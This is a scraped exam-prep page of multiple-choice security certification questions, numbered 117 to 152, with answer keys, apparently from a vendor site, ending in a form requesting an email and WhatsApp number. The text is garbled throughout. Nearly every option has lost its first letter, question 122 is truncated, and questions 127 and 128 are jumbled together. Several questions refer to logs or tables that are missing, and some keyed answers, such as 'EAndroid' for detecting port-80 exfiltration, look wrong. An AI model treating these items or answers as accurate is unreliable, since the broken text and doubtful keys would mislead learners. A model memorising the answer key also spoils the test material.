B. ommand and control
C. ctions on objective
D. xploitation
View answer
Correct Answer: B
Question #117
Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?
A. eb metadata
B. andwidth monitors
C. ystem files
D. orrelation dashboards
View answer
Correct Answer: B
Question #118
A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?
A. AP
B. LS
C. TTPS
D. ES
View answer
Correct Answer: D
Question #119
Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?
A. hain of custody
B. egal hold
C. vent log
D. rtifacts
View answer
Correct Answer: A
Question #120
A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack atLayer 7? (Choose two.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
View answer
Correct Answer: BD
Question #121
On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?
A. houlder surfing
B. atering-hole attack
C. ailgating
D. mpersonation
View answer
Correct Answer: C
Question #122
A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to the phishing team, and the forwarded email revealed the link to be:Click here to unsubscribeWhich of the following will the forensics i
A. QL injection
B. roken authentication
C. SS
D. SRF
View answer
Correct Answer: D
Question #123
A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how future incidents can be avoided. During which of the following stages of the response process will this activity take place?
A. ecovery
B. dentification
C. essons learned
D. reparation
View answer
Correct Answer: C
Question #124
An employee received multiple messages on a mobile device. The messages were instructing the employee to pair the device to an unknown device. Which of the follow ng best describes what a malicious person might be doing to cause this issue to occur?
A. amming
B. luesnarfing
C. vil twin attack
D. ogue access point
View answer
Correct Answer: B
Question #125
Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?
A. arallel
B. ull-scale
C. abletop
D. imulation
View answer
Correct Answer: C
Question #126
A company wants to improve end users' experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner's website?
A. irectory service
B. AA server
C. ederation
D. ultifactor authentication
View answer
Correct Answer: C
Question #127
A security engineer is reviewing the logs from a SAML application that is configured to use MF
A. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally
A. penID is mandatory to make the MFA requirements work
B. n incorrect browser has been detected by the SAML application
C. he access device has a trusted certificate installed that is overwriting the session token
D. he user’s IP address is changing between logins, but the application is not invalidating the token
View answer
Correct Answer: D
Question #128
Which of the following can be used to detect a hacker who is stealing company data over port 80?
A. PS tagging
B. emote wipe
C. creen lock timer
D. EAndroid
View answer
Correct Answer: D
Question #129
During a security incident investigation, an analyst consults the company’s SIEM and sees an event concerning high traffic to a known, malicious command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which of the following can provide this information?
A. AF logs
B. NS logs
C. ystem logs
D. pplication logs
View answer
Correct Answer: B
Question #130
A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a security analyst to have this ability?
A. OAR
B. IEM
C. og collectors
D. etwork-attached storage
View answer
Correct Answer: B
Question #131
If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?
A. erfect forward secrecy
B. lliptic-curve cryptography
C. ey stretching
D. omomorphic encryption
View answer
Correct Answer: A
Question #132
A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:Which of the following describes what is occurring?
A. n attacker is utilizing a password-spraying attack against the account
B. n attacker is utilizing a dictionary attack against the account
C. n attacker is utilizing a brute-force attack against the account
D. n attacker is utilizing a rainbow table attack against the account
View answer
Correct Answer: C
Question #133
A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager's concerns?
A. Implement a full system upgrade
B. Perform a physical-to-virtual migration
C. Install uninterruptible power supplies
D. Purchase cybersecurity insurance
View answer
Correct Answer: B
Question #134
A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would MOST likely have prevented this breach?
A. firewall
B. device pin
C. USB data blocker
D. iometrics
View answer
Correct Answer: C
Question #135
Which of the following would be indicative of a hidden audio file found inside of a piece of source code?
A. teganography
B. omomorphic encryption
C. ipher suite
D. lockchain
View answer
Correct Answer: A
Question #136
A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account.Which of the following does this action describe?
A. nsider threat
B. ocial engineering
C. hird-party risk
D. ata breach
View answer
Correct Answer: A
Question #137
A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?
A. ata owner
B. ata processor
C. ata steward
D. ata collector
View answer
Correct Answer: D
Question #138
A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:
A. rootkit
B. PUP
C. backdoor
D. ansomware
E. RAT
View answer
Correct Answer: B
Question #139
A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL, https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when visiting http://www.anothersite.com. Which of the following describes this attack?
A. n-path
B. omain hijacking
C. NS poisoning
D. vil twin
View answer
Correct Answer: B
Question #140
An organization is moving away from the use of client-side and server-side certificates for EAP. The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?
A. EAP
B. AP-FAST
C. AP-TLS
D. AP-TTLS
View answer
Correct Answer: B
Question #141
The board of directors at a company contracted with an insurance firm to limit the organization's liability. Which of the following risk management practices does this BEST describe?
A. ransference
B. voidance
C. itigation
D. cknowledgement
View answer
Correct Answer: A
Question #142
A user s laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?
A. luejacking
B. amming
C. ogue access point
D. vil twin
View answer
Correct Answer: D
Question #143
A penetration tester is fuzzing an application to identify where the EIP of the stack is located on memory. Which of the following attacks is the penetration tester planning to execute?
A. ace-condition
B. ass-the-hash
C. uffer overflow
D. SS
View answer
Correct Answer: C
Question #144
An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the administrator is being advised to do?
A. erform a mathematical operation on the passwords that will convert them into unique strings
B. dd extra data to the passwords so their length is increased, making them harder to brute force
C. tore all passwords in the system in a rainbow table that has a centralized location
D. nforce the use of one-time passwords that are changed for every login session
View answer
Correct Answer: A
Question #145
While reviewing the wireless router, a systems administrator of a small business determines someone is spoofing the MAC address of an authorized device. Given the table below:Which of the following should be the administrator’s NEXT step to detect if there is a rogue system without impacting availability?
A. onduct a ping sweep,
B. hysically check each system
C. eny internet access to the "UNKNOWN" hostname
D. pply MAC filtering
View answer
Correct Answer: A
Question #146
A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?
A. ontext-aware authentication
B. imultaneous authentication of equals
C. xtensive authentication protocol
D. gentless network access control
View answer
Correct Answer: A
Question #147
An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following activity:-A user enters comptia.org into a web browser.-The website that appears is not the comptia.org site.-The website is a malicious site from the attacker.-Users in a different office are not having this issue.Which of the following types of attacks was observed?
A. n-path attack
B. NS poisoning
C. ocator (URL) redirection
D. omain hijacking
View answer
Correct Answer: C
Question #148
Which of the following BEST describes the process of documenting who has access to evidence?
A. rder of volatility
B. hain of custody
C. on-repudiation
D. dmissibility
View answer
Correct Answer: B
Question #149
Which of the following holds staff accountable while escorting unauthorized personnel?
A. ocks
B. adges
C. ameras
D. isitor logs
View answer
Correct Answer: D
Question #150
Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?
A. ulverizing
B. verwriting
C. hredding
D. egaussing
View answer
Correct Answer: B
Question #151
A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements must be met:•All actions performed by the network staff must be logged.•Per-command permissions must be possible.•The authentication server and the devices must communicate through TCP.Which of the following authentication protocols should the analyst choose?
A. erberos
B. HAP
C. ACACS+
D. ADIUS
View answer
Correct Answer: C
Question #152
A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?
A. og computing and KVMs
B. DI and thin clients
C. rivate cloud and DLP
D. ull drive encryption and thick clients
View answer
Correct Answer: B

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.